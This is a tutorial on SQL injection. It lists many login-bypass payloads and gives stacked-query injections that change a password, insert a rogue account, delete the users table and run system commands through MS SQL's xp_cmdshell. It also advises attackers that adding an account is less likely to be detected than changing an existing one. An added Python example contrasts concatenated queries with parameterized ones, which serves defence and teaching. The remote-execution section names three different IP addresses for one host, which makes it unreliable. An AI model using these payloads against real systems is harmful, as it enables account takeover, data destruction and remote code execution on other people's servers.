Structured Query Language – SQL Injection
A major attack vector that web programmers sometimes forget about is input cleansing. If user input is not cleansed before the data is submitted to the SQL server, attackers can submit malicious code to the server. This code can make the server return more data than it should, or allow the attacker to delete entire databases.
SQL injection points occur anywhere user input is not properly cleansed. The most common points of attack are login pages, search pages and URL strings, but attacks are not limited to these points of entry. All user input needs to be correctly cleansed to prevent SQL injection attacks.
SQL Injection Basics
SQL injection is simple in theory: the attacker finds an input that is trusted and passed to the SQL server. Once a vulnerable input has been found, the goal is to force the SQL query to return true regardless of what the programmer intended.
The most common way to force a SQL statement to return true is to add ' OR 1=1-- to a vulnerable input.
' OR 1=1--
' : Closes the string that the vulnerable input is expecting.
OR : a logical operator that allows a second condition to be appended. Because of the OR, even if the first condition fails (the empty string matches nothing), the whole expression evaluates to true when the second condition is true.
1=1 : Since 1 always equals 1, this expression evaluates to true.
-- : A comment marker; SQL ignores everything after the -- (dash dash).
Here are a few variations along the same lines as above:
| Variation | Variation |
|---|---|
| admin'-- | ' or 0=0 -- |
| " or 0=0 -- | or 0=0 -- |
| ' or 0=0 # | " or 0=0 # |
| or 0=0 # | ' or 'x'='x |
| " or "x"="x | ') or ('x'='x |
| ' or 1=1-- | " or 1=1-- |
| or 1=1-- | ' or a=a-- |
| " or "a"="a | ') or ('a'='a |
| ") or ("a"="a | hack" or "a"="a |
| hack" or 1=1 -- | hack' or 1=1 -- |
| hack' or 'a'='a | hack') or ('a'='a |
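As an added example that is not part of the original page: a minimal login check against an in-memory SQLite database (constructed sample users; the table and column names are assumptions) showing how the ' OR 1=1-- and admin'-- payloads above subvert a query built by string concatenation, and how the same inputs become harmless literal values once the query is parameterized.

```python
import sqlite3


def make_db():
    # Constructed demo data, not from the original page.
    con = sqlite3.connect(":memory:")
    con.execute("CREATE TABLE users (username TEXT, password TEXT)")
    con.executemany("INSERT INTO users VALUES (?, ?)",
                    [("alice", "s3cret"), ("admin", "hunter2")])
    return con


def login_vulnerable(con, username, password):
    # The pattern the page describes: raw input spliced into the query text.
    # A quote in the input closes the string, and -- comments out the rest,
    # so the password check disappears from the statement entirely.
    sql = (f"SELECT username FROM users WHERE username = '{username}' "
           f"AND password = '{password}'")
    return sorted(row[0] for row in con.execute(sql))


def login_safe(con, username, password):
    # Parameterized query: the driver binds the values separately from the
    # SQL text, so quotes and comment markers are matched as data, never
    # parsed as syntax. The payloads simply fail to match any row.
    sql = "SELECT username FROM users WHERE username = ? AND password = ?"
    return sorted(row[0] for row in con.execute(sql, (username, password)))


if __name__ == "__main__":
    db = make_db()
    for payload in ["alice", "' OR 1=1--", "admin'--"]:
        print(f"{payload!r:14} vulnerable={login_vulnerable(db, payload, 'wrong')} "
              f"safe={login_safe(db, payload, 'wrong')}")
```

The tautology payload returns every user from the concatenated query and nothing from the parameterized one; the same comparison is a useful unit test to keep around for any login or search handler.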
Update Data in Database
The ability to edit data in the database can allow attackers to change admin passwords. This attack can be done in a URL, a search box, a login page or any other unprotected input location. The following code sample shows how a password can be changed if the table name and an account are known.
'; UPDATE users SET password = 'hacked' WHERE username='crackable'--
The above code updates the users table where the username is crackable. SET states that the password field for the username crackable will be changed to hacked.
Insert Data into Database
Inserting data into a database is very similar to updating the table. As with the update, this attack can be done in a URL, a search box, a login page or any other unprotected input location. The following example assumes that the attacker knows the table and the general structure of the table.
'; INSERT INTO users (id, username, password, details) VALUES (1203, 'myaccount', 'mypassword', 'NA')--
The above code inserts a new user into the users table. A new account is created with an id of 1203, username of myaccount, password of mypassword, and details of NA. Creating new accounts is less likely to be detected than changing the password of an existing account. If enough table information can be gained to insert a new account into the users table, that is preferred over updating an existing account. If table information cannot be obtained, the next best thing is to change a user's password with an update.
Deleting Data from a Database
Deleting data from a database is very similar to updating and inserting data in a database table. As with the update and the insert, this attack can be done in a URL, a search box, a login page or any other unprotected input location. The following code sample requires the attacker to know the table name.
'; DELETE FROM users --
The above code sample deletes all the data from the users table. In general an attacker would only use this delete command if they wanted to be purely destructive. This command will be discovered very quickly, since users will be unable to log into the website.
Remote Execution with SQL Injection (MS SQL)
SQL injections can be very powerful. This is an example of a SQL injection attack that can lead to remote execution. The default installation of MS SQL Server runs as local system, which is the same as Administrator. With the following code, stored procedures like master..xp_cmdshell can be executed, which would allow an attacker to run commands as if they were on the box.
'; exec master..xp_cmdshell 'ping 184.108.40.206'--
The semicolon in the statement ends the current SQL query and allows a new SQL command to follow. To verify that the command executed successfully, a packet sniffer can be used to capture ICMP packets on 220.127.116.11. If packets are received at 18.104.22.168 from the SQL server, the stored procedure was executed successfully.